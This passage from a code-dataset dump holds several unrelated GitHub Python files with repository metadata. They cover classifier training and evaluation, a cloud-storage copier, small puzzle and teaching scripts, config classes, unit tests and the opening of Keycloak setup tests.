[2**(-5),2**(-3),2**(-1),2**(1),2**(3),2**(5),2**(7),2**(9),2**(11),2**(13),2**(15)]\n    gamma_range = [2**(-15),2**(-13),2**(-11),2**(-9),2**(-7),2**(-5),2**(-3),2**(-1),2**(1),2**(3)]\n    param_grid = dict(gamma=gamma_range, C=C_range)\n    cv = StratifiedShuffleSplit(y_train, n_iter=5, test_size=0.2, random_state=42)\n    grid = GridSearchCV(SVC(), param_grid=param_grid, cv=cv)\n    grid.fit(XTrainScaled, y_train)\n\n    print(\"The best parameters are %s with a score of %0.2f\" % (grid.best_params_, grid.best_score_))\n\n    C=grid.best_params_['C']\n    clf_ChromeTrainRBF = SVC(kernel='rbf', gamma=grid.best_params_['gamma'], C=C)\n    clf_ChromeTrainRBF.fit(XTrainScaled, y_train)\n    
#MultinomialNB(alpha=1.0, class_prior=None, fit_prior=False)\n    filename = 'SVMRBF.joblib.pkl'\n    joblib.dump(clf_ChromeTrainRBF, filename, compress=9)\n\ndef testSVC_RBF(X_test,y_test):\n    clf = joblib.load('SVMRBF.joblib.pkl')\n    scaler = joblib.load('TrainScalar.joblib.pkl')\n    X_testScaled = scaler.transform(X_test)\n    y_pred = clf.predict(X_testScaled)\n    print('SVC precision: ',metrics.precision_score(y_test, y_pred))\n    print('SVC accuracy: ',metrics.accuracy_score(y_test, y_pred))\n    precision, recall, threshold = precision_recall_curve(y_test, y_pred)\n\ndef plot_confusion_matrix(cm, eunique_label,title='Confusion matrix', cmap=plt.cm.Blues):\n    plt.imshow(cm, interpolation='nearest', cmap=cmap)\n    plt.title(title)\n    plt.colorbar()\n    tick_marks = np.arange(len(eunique_label))\n    plt.xticks(tick_marks, eunique_label, rotation=45)\n    plt.yticks(tick_marks, eunique_label)\n    plt.tight_layout()\n    plt.ylabel('True label')\n    plt.xlabel('Predicted label')\n\ndef trainTestM(X_train,X_test,y_train,y_test):\n    h = .02 # step size in the mesh\n\n    names = [ \"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\"Decision Tree\",\n             \"Random Forest\", \"AdaBoost\", \"Naive Bayes\", \"Linear Discriminant Analysis\",\n             \"Quadratic Discriminant Analysis\"]\n    classifiers = [\n        KNeighborsClassifier(32),\n        SVC(kernel=\"linear\", C=0.025),\n        SVC(gamma=2, C=1),\n        DecisionTreeClassifier(max_depth=5),\n        # DecisionTreeClassifier(max_depth=5),\n        RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n        AdaBoostClassifier(),\n        GaussianNB(),\n        LinearDiscriminantAnalysis(),\n        QuadraticDiscriminantAnalysis()]\n\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    X_train = scaler.transform(X_train)\n    X_test = scaler.transform(X_test)\n\n    # iterate over classifiers\n    for name, clf in zip(names, classifiers):\n        clf.fit(X_train, y_train)\n        score = clf.score(X_test, y_test)\n        y_pred = clf.predict(X_test)\n        print('name: ',name,'score: ',score)\n        print(name,' precision: ',metrics.precision_score(y_test, y_pred))\n        print(name,' accuracy: ',metrics.accuracy_score(y_test, y_pred))\n        class_report = classification_report(y_test, y_pred)\n        out_name= 'accuracy_report_{}_.txt'.format(name)\n        with open(out_name, \"w\") as text_file:\n            text_file.write(class_report)\n            text_file.write('precision: %s'%metrics.precision_score(y_test, y_pred))\n            text_file.write(' accuracy: %s'%metrics.accuracy_score(y_test, y_pred))\n        print(class_report)\n\n        filename = \"clas_{}\".format(name)\n        joblib.dump(clf, filename, compress=9)\n\n        # Compute confusion matrix\n        cm = confusion_matrix(y_test, y_pred)\n        np.set_printoptions(precision=2)\n\n        # Normalize the confusion matrix by row (i.e by the number of samples\n        # in each class)\n        cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n        print('Normalized confusion matrix')\n        print(cm_normalized)\n        plt.figure()\n        eunique_label = np.unique(y_train.tolist())\n        plot_confusion_matrix(cm_normalized, eunique_label,title='Normalized confusion matrix')\n        image_name = name + \".pdf\"\n        plt.savefig(image_name)\n\ndef ensembleVoting(X_train,y_train,X_test,y_test):\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    X_train = scaler.transform(X_train)\n    X_test = scaler.transform(X_test)\n    # num_folds = 3\n    # num_instances = len(X)\n    # seed = 7\n    # kfold = cross_validation.KFold(n=num_instances, n_folds=num_folds, random_state=seed)\n    # create the sub models\n    estimators = []\n    # model1 = LogisticRegression()\n    # estimators.append(('logistic', model1))\n    # model2 = DecisionTreeClassifier()\n    # 
estimators.append(('cart', model2))\n # model3 = SVC()\n # estimators.append(('svm', model2))\n # names = [ \"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\"Decision Tree\",\n # \"Random Forest\", \"AdaBoost\", \"Naive Bayes\", \"Linear Discriminant Analysis\",\n # \"Quadratic Discriminant Analysis\"]\n\n model1 = KNeighborsClassifier()\n estimators.append(('knn', model1))\n model2 = SVC()\n estimators.append(('svmrbf', model2))\n model3 = DecisionTreeClassifier(max_depth=20)\n estimators.append(('DecisionTree', model3))\n # model4 = LinearDiscriminantAnalysis()\n # estimators.append(('LDA', model4))\n\n # classifiers = [\n # KNeighborsClassifier(32),\n # SVC(kernel=\"linear\", C=0.025),\n # SVC(gamma=2, C=1),\n # DecisionTreeClassifier(max_depth=5),\n # RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n # AdaBoostClassifier(),\n # GaussianNB(),\n # LinearDiscriminantAnalysis(),\n # QuadraticDiscriminantAnalysis()]\n\n # create the ensemble model\n ensemble = VotingClassifier(estimators)#, voting='soft', weights=[1,2,1,1])\n # ensemble.fit(X_train,y_train)\n params = {'svmrbf__gamma': [2**(-7),2**(-5),2**(-3)],\n 'svmrbf__C': [2**(5),2**(7),2**(9),2**(11),2**(13)],\n 'knn__algorithm': ['ball_tree'],\n 'knn__n_neighbors': [14, 16, 20],\n 'knn__metric': [ # 'chebyshev', 'sokalmichener',\n 'canberra'#, 'dice', 'euclidean',\n #'braycurtis', 'russellrao','cityblock', 'manhattan']}\n ]}\n\n grid = GridSearchCV(estimator=ensemble, param_grid=params, cv=5, n_jobs=-1)\n grid = grid.fit(X_train,y_train)\n print(grid.grid_scores_)\n # print(ensemble.score(X_test,y_test))\n # results = cross_validation.cross_val_score(ensemble, X, y, cv=kfold)\n # print(results.mean())\n\ndef CategoricalEnsembleVoting(X_train,y_train,X_test,y_test):\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n clf = CategoryClassifier()\n clf.fit(X_train, y_train)\n print(repr(clf.score(X_test, y_test)))\n\n\"\"\" mean: 0.99819, std: 0.00051, params:\n {'svmrbf__gamma': 0.0078125, 'knn__algorithm': 'ball_tree',\n 'knn__n_neighbors': 16, 'svmrbf__C': 8192, 'knn__metric': 'canberra'} \"\"\"\ndef fiveFold():\n\n # Feature groups\n # protocol_dependent = range(13) + range(66,69)\n # protocol_dependent = range(23) + range(66,69)\n # peak features\n # protocol_dependent = range(23,41)\n # All but peak\n # protocol_dependent = range(23) + range(41,69)\n fsslv_cipher_suites = [6,7,8,9,10,11,12]\n protocol_dependent = []\n\n # Load data\n data_path = os.getcwd() + \"/data_set/libSVM\"\n\n train_0 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_0_train\"\n test_0 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_0_test\"\n train_1 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_1_train\"\n test_1 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_1_test\"\n train_2 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_2_train\"\n test_2 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_2_test\"\n train_3 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_3_train\"\n test_3 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_3_test\"\n train_4 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_4_train\"\n test_4 = data_path + \"/samples_25.2.16_comb_triple.csv_libSVM_4_test\"\n\n X_train_0, y_train_0, X_test_0, y_test_0 = load_svmlight_files(\n (train_0, test_0))\n X_train_1, y_train_1, X_test_1, y_test_1 = load_svmlight_files(\n (train_1, test_1))\n X_train_2, y_train_2, X_test_2, 
y_test_2 = load_svmlight_files(\n        (train_2, test_2))\n    X_train_3, y_train_3, X_test_3, y_test_3 = load_svmlight_files(\n        (train_3, test_3))\n    X_train_4, y_train_4, X_test_4, y_test_4 = load_svmlight_files(\n        (train_4, test_4))\n\n    df_train_0 = pd.DataFrame(X_train_0.toarray())\n    df_test_0 = pd.DataFrame(X_test_0.toarray())\n    df_train_1 = pd.DataFrame(X_train_1.toarray())\n    df_test_1 = pd.DataFrame(X_test_1.toarray())\n    df_train_2 = pd.DataFrame(X_train_2.toarray())\n    df_test_2 = pd.DataFrame(X_test_2.toarray())\n    df_train_3 = pd.DataFrame(X_train_3.toarray())\n    df_test_3 = pd.DataFrame(X_test_3.toarray())\n    df_train_4 = pd.DataFrame(X_train_4.toarray())\n    df_test_4 = pd.DataFrame(X_test_4.toarray())\n\n    X_train_0 = df_train_0.drop(protocol_dependent, axis=1)\n    X_test_0 = df_test_0.drop(protocol_dependent, axis=1)\n    X_train_1 = df_train_1.drop(protocol_dependent, axis=1)\n    X_test_1 = df_test_1.drop(protocol_dependent, axis=1)\n    X_train_2 = df_train_2.drop(protocol_dependent, axis=1)\n    X_test_2 = df_test_2.drop(protocol_dependent, axis=1)\n    X_train_3 = df_train_3.drop(protocol_dependent, axis=1)\n    X_test_3 = df_test_3.drop(protocol_dependent, axis=1)\n    X_train_4 = df_train_4.drop(protocol_dependent, axis=1)\n    X_test_4 = df_test_4.drop(protocol_dependent, axis=1)\n\n    # X_train_0 = randomProtocolValues(X_train_0)\n    # X_test_0 = randomProtocolValues(X_test_0)\n    # X_train_1 = randomProtocolValues(X_train_1)\n    # X_test_1 = randomProtocolValues(X_test_1)\n    # X_train_2 = randomProtocolValues(X_train_2)\n    # X_test_2 = randomProtocolValues(X_test_2)\n    # X_train_3 = randomProtocolValues(X_train_3)\n    # X_test_3 = randomProtocolValues(X_test_3)\n    # X_train_4 = randomProtocolValues(X_train_4)\n    # X_test_4 = randomProtocolValues(X_test_4)\n\n\n    # Prepare ensemble method\n    estimators = []\n    model1 = KNeighborsClassifier(n_neighbors=16,algorithm='ball_tree',\n                                  metric='canberra', n_jobs=-1)\n    estimators.append(('knn', model1))\n    model2 = SVC(gamma=0.0078125,C=8192, probability=False)\n    estimators.append(('svmrbf', model2))\n    model3 = DecisionTreeClassifier()#max_depth=50)\n    estimators.append(('DecisionTree', model3))\n    model4 = RandomForestClassifier(n_estimators=100, oob_score=True,\n                                    n_jobs=-1)\n    estimators.append(('RandomForest', model4))\n    model5 = XGBClassifier(max_depth=10, n_estimators=100, learning_rate=0.1)\n    estimators.append(('XGBoost', model5))\n\n    # ensemble = VotingClassifier(estimators,voting='hard')\n    ensemble = CategoryClassifier()\n\n    # CategoricalEnsembleVoting(X_train_0, y_train_0, X_test_0, y_test_0)\n    oneFold(X_train_0, y_train_0, X_test_0, y_test_0, ensemble)\n    oneFold(X_train_1, y_train_1, X_test_1, y_test_1, ensemble)\n    oneFold(X_train_2, y_train_2, X_test_2, y_test_2, ensemble)\n    oneFold(X_train_3, y_train_3, X_test_3, y_test_3, ensemble)\n    oneFold(X_train_4, y_train_4, X_test_4, y_test_4, ensemble)\n\n\ndef randomProtocolValues(X):\n    # protocol features\n    a = list(range(13)) + list(range(66, 69))  # list() is required on Python 3, where range objects cannot be concatenated\n    l = len(X)\n\n    for i in a:\n        X[i] = np.random.random(l) * 100\n\n    return X\n\n\n\ndef oneFold(X_train,y_train,X_test,y_test,clf):\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    X_train = scaler.transform(X_train)\n    X_test = scaler.transform(X_test)\n    clf.fit(X_train, y_train)\n    print(repr(clf.score(X_test, y_test)))\n\n#-----------------------MAIN------------------------------------------------------\nif __name__ == \"__main__\":\n\n    data_path = os.getcwd() + \"/data_set\"\n    all_features_path = data_path + \"/samples_25.2.16_all_features_triple.csv\"\n    # all_features_path = data_path + \"/samples_17.7.16_all_features_app.csv\"\n    rows_to_skip = [0]\n    ds = read_data_set(all_features_path, rows_to_skip=rows_to_skip)\n    # print repr(ds)\n\n    ds = ds.dropna()\n    y = ds.iloc[:,len(ds.columns)-1]\n    # num_classes, y = np.unique(y, return_inverse=True)\n    # X = ds.drop([str(len(ds.columns)-1)], axis=1)\n    X = ds.drop([len(ds.columns)-1], axis=1)\n    # X = ds.drop([2,4,9,11], axis=1)\n\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n    # trainTestM(X_train,X_test,y_train,y_test)\n    # trainKNN(X_train,y_train)\n    # testKNN(X_test,y_test)\n    # ensembleVoting(X_train, y_train, X_test, y_test)\n    # CategoricalEnsembleVoting(X_train, y_train, X_test, y_test)\n    fiveFold()\n","repo_name":"JonMuehlst/ml-score","sub_path":"featureClassification.py","file_name":"featureClassification.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"13080508225","text":"# coding:utf-8\n# feature analysis\nimport numpy as np\nimport pandas as pd \nfrom matplotlib.pyplot import *\n\n\ndata = pd.read_csv('data.train.csv')\n\nvar = np.log(.3+data['item_buy_count'])\n#var = np.exp(var)\nbins = np.linspace(min(var),max(var)*1.01,100)\nlog_likehood = []\nnum = []\nfor i in range(1,len(bins)):\n    candidate = data[(var<bins[i])&(var>=bins[i-1])]\n    likehood = np.sum(candidate['buy']==1)*1.0/(1+np.sum(candidate['buy']==0))\n    log_likehood.append((likehood))\n    num.append(len(candidate))\nsemilogy(bins[1:],log_likehood,'ro')\nshow()\nsemilogy(bins[1:],(1+np.array(num)),'ro')\nshow()\n","repo_name":"tracholar/alibaba2015","sub_path":"feature_analysis.py","file_name":"feature_analysis.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"18314387281","text":"# Serverless Project\n# Author : Yashesh Savani\n# Date Created: 24th July, 2020\n# Task: Ingest chat json files from google cloud storage to s3 bucket\n\nfrom google.cloud import storage\nimport boto3\nimport os\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = os.path.join(os.getcwd(), \"Serverless Project-data processing.json\")\n\ndef ingest_chat_files():\n\n    GCP_BUCKET = os.getenv(\"GCP_BUCKET\")\n    S3_BUCKET = os.getenv(\"S3_BUCKET\")\n    # Create object of cloud storage client and get blob object of file\n    client_storage = storage.Client()\n    file_blobs_list = client_storage.list_blobs(GCP_BUCKET)\n    src_bucket_object = client_storage.bucket(GCP_BUCKET)\n\n    s3_client = boto3.client(\"s3\")\n\n    # Loop through all the file objects got from GCP storage\n    for jsonfile in file_blobs_list:\n        src_bucket_blob = src_bucket_object.get_blob(jsonfile.name)\n        file_data = src_bucket_blob.download_as_string()\n        s3_client.put_object(Bucket=S3_BUCKET, Key=jsonfile.name, Body=file_data)\n\n\nif __name__ == \"__main__\":\n    ingest_chat_files()\n\nfrom google.cloud import storage\nimport boto3\nimport os\n\n\ndef hello_world(request):\n    GCP_BUCKET = os.getenv(\"GCP_BUCKET\")\n    S3_BUCKET = os.getenv(\"S3_BUCKET\")\n    # Create object of cloud storage client and get blob object of file\n    client_storage = storage.Client()\n    file_blobs_list = client_storage.list_blobs(GCP_BUCKET)\n    src_bucket_object = client_storage.bucket(GCP_BUCKET)\n    print(\"GCP connected\")\n    # create client of S3\n    s3_client = boto3.client(\"s3\", aws_access_key_id=os.getenv(\"aws_access_key_id\"),\n                             aws_secret_access_key=os.getenv(\"aws_secret_access_key\"),\n                             aws_session_token=os.getenv(\"aws_session_token\"))\n    print(\"S3 client created\")\n    # Loop through all the file objects got from GCP storage\n    for jsonfile in file_blobs_list:\n        src_bucket_blob = src_bucket_object.get_blob(jsonfile.name)\n        file_data = src_bucket_blob.download_as_string()\n\n        # Create files in S3 bucket\n        s3_client.put_object(Bucket=S3_BUCKET, Key=jsonfile.name, Body=file_data)\n\n    return (\"Chat files tagged\", 200)  # Flask-style (body, status) response tuple","repo_name":"vikashsalvi/DAL_LMS","sub_path":"Machine learning analysis 2/ingest_chat.py","file_name":"ingest_chat.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"32659958219","text":"# The shape must form an hourglass:\n# 1 1 1\n# 0 1 0\n# 1 1 1\n# Given that shape, sum all the values sitting where the 1s are in the 3x3 window above\n\n# Complete the hourglassSum function below.\ndef hourglassSum(arr):\n    maximum = -999999 # arbitrary initial maximum\n    for i in range(len(arr)) :\n        if i+2 < len(arr) : # pick the rows where an hourglass still fits\n            for j in range(len(arr[i])) :\n                if j+2 < len(arr[i]) : # add up the values at the hourglass positions\n                    tmp = arr[i][j] + arr[i][j+1] + arr[i][j+2] + arr[i+1][j+1] + arr[i+2][j] + arr[i+2][j+1] + arr[i+2][j+2]\n                    if tmp > maximum :\n                        maximum = tmp\n\n    return maximum\n    ","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/Arrays/2D_Array_DS.py","file_name":"2D_Array_DS.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71418731985","text":"from datetime import datetime, timedelta\nimport requests\n\nclass LinkedInConfig:\n\n    def GetLinkedinRefreshToken(self, CLIENT_SECRET, CLIENTID):\n        API_URL = f'https://www.linkedin.com/oauth/v2/accessToken?grant_type=client_credentials&client_id={CLIENTID}&' \\\n                  f'client_secret={CLIENT_SECRET}'\n        return requests.get(API_URL).json()['access_token']\n\n    def __init__(self):\n        with open('env/linkedin.txt') as fi:\n            self.CLIENT_SECRET = fi.readline().rstrip('\\n')\n        self.CLIENTID = '77plycpp70x634'\n        self.TOKEN = LinkedInConfig.GetLinkedinRefreshToken(self, self.CLIENT_SECRET, self.CLIENTID)\n        self.MEASURE_PERIOD = 'WEEK' # Day or Week\n        self.MEASURE_PERIOD_LOOKAHEAD = 1 # In days, can be a max of 14 days whether using DAY (14) or WEEK (2)\n        self.MEASURE_PERIOD_START = round((datetime.now() + timedelta(-7)).timestamp() * 1000) # epoch ms, 7 days ago\n        self.PAGE_COUNT = 1000\n        self.PAGE_START = 0\n        self.ASSET_TYPE = ['COURSE', 'VIDEO', 'ARTICLE', 'BOOK', 'EVENT', 'LEARNING_COLLECTION', 'LEARNING_PATH',\n                          'DOCUMENT']\n        self.HEADERS = {'Authorization': 'Bearer ' + self.TOKEN,\n                        'Connection': 'keep-alive'}\n        self.DBTABLE = 'LinkedInLearning_ActivityReports'\n\n\n\n","repo_name":"L1nc0lnV/linkedin-learning-reports","sub_path":"settings/linkedin.py","file_name":"linkedin.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"22661699117","text":"lines = [x.strip() for x in open('input.txt', 'r')]\n\npadding = 2\n\ncoding = lines[0].replace('#', '1').replace('.', '0')\nimage = [\"0\" * padding + l.replace('#', '1').replace('.', '0') + \"0\" * padding for l in lines[2:]]\nimage = [*[\"0\" * len(image[0]) for _ in range(padding)], *image, *[\"0\" * len(image[0]) for _ in range(padding)]]\n\ndef get_index(image, x, y):\n    s = image[y-1][x-1:x+2] + image[y][x-1:x+2] + image[y+1][x-1:x+2]\n    return int(s, 2)\n\ndef get_new(image, c, padding = 0):\n    new_image = [\n        *[c * (len(image[0]) + 
padding*2-2) for _ in range(padding)]\n    ]\n\n    for y in range(1, len(image) - 1):\n        new_image.append(c * padding)\n        for x in range(1, len(image[0]) - 1):\n            i = get_index(image, x, y)\n            new_image[-1] += coding[i]\n        new_image[-1] += c * padding\n\n    for _ in range(padding):\n        new_image.append(c * (len(image[0]) + padding*2-2))\n\n    return new_image\n\nc = 0\nfor l in get_new(get_new(image, '1', 2), '0', 0):\n    c += l.count('1')\nprint(c)\n\nfor i in range(25):\n    image = get_new(image, '1', 2)\n    image = get_new(image, '0', 2)\n\nc = 0\nfor l in image:\n    c += l.count('1')\nprint(c)","repo_name":"whymatter/AdventOfCode2021","sub_path":"puzzle_20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"6832173452","text":"# An example for break\nlist = [5, 6, 7, 8, 9]\nfor word in list:\n    if word == 8:\n        print(\"Break encountered\")\n        break\n    print(word)\n\n# An example for continue\nlist = [5, 6, 7, 8, 9]\nfor word in list:\n    if word == 8:\n        print(\"Skipping the 8\")\n        continue\n    print(word)\n","repo_name":"HiteshGarg/codingeek","sub_path":"Python/break and continue.py","file_name":"break and continue.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"2344602408","text":"import sys\n\nt = int(sys.stdin.readline())\n\nfor _ in range(t):\n    res = []\n    n = int(sys.stdin.readline())\n    c = sys.stdin.readline().split()\n\n    # The first card goes into the list unconditionally.\n    res.append(c[0])\n\n    # Compare every card after the first one, up to the last card.\n    for i in range(1, n):\n\n        # Compare by ASCII code.\n        # If the first card's ASCII code is smaller than the next card's, append the card at the back.\n        if ord(res[0]) < ord(c[i]):\n            res.append(c[i])\n\n        # Otherwise, when the first card's ASCII code is larger, insert the next card at index 0.\n        else:\n            res.insert(0, c[i])\n\n    # Turn the list into a string with join and print it.\n    print(''.join(res))\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Greedy_Algorithm/13417.py","file_name":"13417.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
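A side note on the card-arranging loop above: res.insert(0, ...) on a Python list is O(n) per call, while collections.deque grows at both ends in O(1). The same greedy rewritten with a deque (a sketch; single-character cards assumed, where ord(a) < ord(b) is just a < b):

from collections import deque

def arrange(cards):
    res = deque([cards[0]])
    for card in cards[1:]:
        if res[0] < card:
            res.append(card)       # bigger card goes to the back
        else:
            res.appendleft(card)   # otherwise it goes to the front
    return ''.join(res)

print(arrange(list("BACA")))  # AABC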
{"seq_id":"33520085784","text":"import unittest\nimport pandas as pd\nimport sys\n\nsys.path.insert(0, \"..\")\nfrom aplication.app import NetflixHistoryScreen, setUp\n\n\nclass NetflixList(unittest.TestCase):\n    app = setUp()\n    app.screen_manager = app.build()\n\n    def testGenerateListFromCSV(self):\n        NHS = NetflixHistoryScreen()\n        NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n\n        with open(\"./sampledata/data_with_genres.csv\") as file:\n            reader = pd.read_csv(file)\n            data = list(reader)\n\n        all_films = []\n        for i in NHS.list_of_films.children:\n            all_films.append(i.text)\n\n        for l1, l2 in zip(data, all_films):\n            self.assertEqual(l1, l2)\n\n\nclass NetflixSearch(unittest.TestCase):\n    app = setUp()\n    app.screen_manager = app.build()\n\n    def testNetflixListSearch(self):\n        NHS = NetflixHistoryScreen()\n        NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n        NHS.searchTitle(\"The\")\n\n        with open(\"./sampledata/expected_search_result.csv\") as file:\n            reader = pd.read_csv(file)\n            data = list(reader)\n\n        searched = []\n        for i in NHS.list_of_films.children:\n            searched.append(i.text)\n\n        for l1, l2 in zip(data, searched):\n            self.assertEqual(l1, l2)\n\n    def testNetflixListFilter(self):\n        NHS = NetflixHistoryScreen()\n        NHS.loadHistory(\"./sampledata/data_with_genres.csv\")\n        NHS.searchFiltered(\"Drama|Crime\")\n\n        with open(\"./sampledata/expected_filter_result.csv\") as file:\n            reader = pd.read_csv(file)\n            data = list(reader)\n\n        searched = []\n        for i in NHS.list_of_films.children:\n            searched.append(i.text)\n\n        for l1, l2 in zip(data, searched):\n            self.assertEqual(l1, l2)\n","repo_name":"stats-io/stats.io","sub_path":"tests/netflixtests/testHistoryScr.py","file_name":"testHistoryScr.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"8008642194","text":"class AlgoConfig:\n    def __init__(self):\n        self.gamma = 0.99 # discount factor\n        self.critic_lr = 1e-3 # learning rate for critic\n        self.actor_lr = 1e-4 # learning rate for actor\n        self.buffer_size = 8000 # size of replay buffer\n        self.batch_size = 128 # mini-batch size\n        self.tau = 0.001 # soft update\n        self.critic_hidden_dim = 256 # hidden dimension of critic\n        self.actor_hidden_dim = 256 # hidden dimension of actor","repo_name":"johnjim0816/rl-tutorials","sub_path":"joyrl/algos/DDPG/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"48"}
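The tau above is DDPG's soft-update (Polyak averaging) rate: after each learning step the target networks track the online ones via theta_target <- tau*theta + (1-tau)*theta_target. A minimal PyTorch-style sketch of that update (function and argument names are illustrative, not from the repo):

def soft_update(target_net, online_net, tau=0.001):
    # target parameters drift slowly toward the online parameters
    for t_param, param in zip(target_net.parameters(), online_net.parameters()):
        t_param.data.copy_(tau * param.data + (1.0 - tau) * t_param.data)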
{"seq_id":"16900111769","text":"#03 - Using repetition structures with a logical test, write a program that asks for a password before it starts processing and only lets the user continue once the password is correct. After login, welcome the user and present the guessing game, where the computer will \"think\" of an integer between 0 and 20. The player keeps guessing until they get it right; after each guess, tell the player whether the chosen number is higher or lower than the guess, and at the end show how many guesses were needed to win.\n\nfrom random import randint\n\n\n\nusuario = input(\"Enter a user name to register: \")\nsenha = input(\"Enter a password to register: \")\n\nwhile usuario == senha:\n    print(\"Your password must be different from your user name:\")\n    senha = input(\"Password: \")\n\nprint(\"Registration approved\")\n\nlogin = input(\"Enter your user name: \")\n\nwhile login != usuario:\n    print(\"Wrong user name, try again!\")\n    login = input(\"Enter your user name: \")\n\nkey = input(\"Enter your password: \")\n\n\nwhile key != senha:\n    print(\"Wrong password, try again:\")\n    key = input(\"Enter your password: \")\n\nprint(\"Welcome to the guessing game! Can you guess the number I am thinking of?!\")\ncomputador = randint(0, 20)\n\n\nprint(\"I will think of a number from 0 to 20, try to guess it!\")\n\nacertou = False\npalpites = 0\n\nwhile not acertou:\n    jogador = int(input(\"So, what is your guess? (0 to 20): \"))\n    palpites += 1\n\n    if jogador == computador:\n        acertou = True\n        print(f\"You got it!!! I was thinking exactly of {computador}, and you needed {palpites} guesses\")\n    else:\n        if jogador < computador:\n            print(\n                f\"Hmm... not this time, I was thinking of a number bigger than {jogador}\")\n        elif jogador > computador:\n            print(\n                f\"Hmm... not this time, I was thinking of a number smaller than {jogador}\")","repo_name":"rosifurst/Blue-Edtech_M-dulo01","sub_path":"Exercícios/ex003.py","file_name":"ex003.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"39170952638","text":"import json\n\nimport base64\nimport fixtures\nfrom kubernetes.client import rest\nimport mock\nimport requests\nimport responses\nimport testtools\n\nfrom keycloak_setup import keycloak_setup\n\n\nclass TestKeycloakSetup(testtools.TestCase):\n    def test_run(self):\n        skc_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_setup_keycloak')).mock\n\n        kcs = keycloak_setup.KeycloakSetup()\n\n        kcs.run()\n\n        skc_mock.assert_called_once_with()\n\n    def test_run_post_clients(self):\n        ccs_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_cleanup_clients')).mock\n        css_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_cleanup_secrets')).mock\n        cfs_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_check_features')).mock\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs.run_post_clients()\n\n        ccs_mock.assert_called_once_with()\n        css_mock.assert_called_once_with()\n        cfs_mock.assert_called_once_with()\n\n    def test_kc_master_admin_client(self):\n        kcs = keycloak_setup.KeycloakSetup()\n\n        lac_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.oauthlib.oauth2, 'LegacyApplicationClient')).mock\n        osess_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.requests_oauthlib, 'OAuth2Session')).mock\n\n        client = kcs.kc_master_admin_client\n\n        self.assertIs(client, osess_mock.return_value)\n\n        lac_mock.assert_called_once_with(client_id='admin-cli')\n\n        kc_master_token_endpoint = (\n            'http://keycloak.services:8080/keycloak/realms/'\n            'master/protocol/openid-connect/token')\n        osess_mock.assert_called_once_with(\n            client=lac_mock.return_value,\n            auto_refresh_url=kc_master_token_endpoint,\n            auto_refresh_kwargs={\n                'client_id': 'admin-cli',\n            },\n            token_updater=mock.ANY)\n\n        oauth2session = osess_mock.return_value\n\n        oauth2session.fetch_token.assert_called_once_with(\n            token_url=kc_master_token_endpoint,\n            client_id='admin-cli',\n            username='admin',\n            password='adminpwd')\n\n        self.assertIs(kcs._kc_master_admin_client_cache, client)\n\n    def test_setup_keycloak(self):\n        wkr_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_wait_keycloak_ready'\n        )).mock\n\n        csr_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, 'create_realm'\n        )).mock\n\n        kcs = keycloak_setup.KeycloakSetup()\n\n        kcs._setup_keycloak()\n\n        wkr_mock.assert_called_once_with()\n        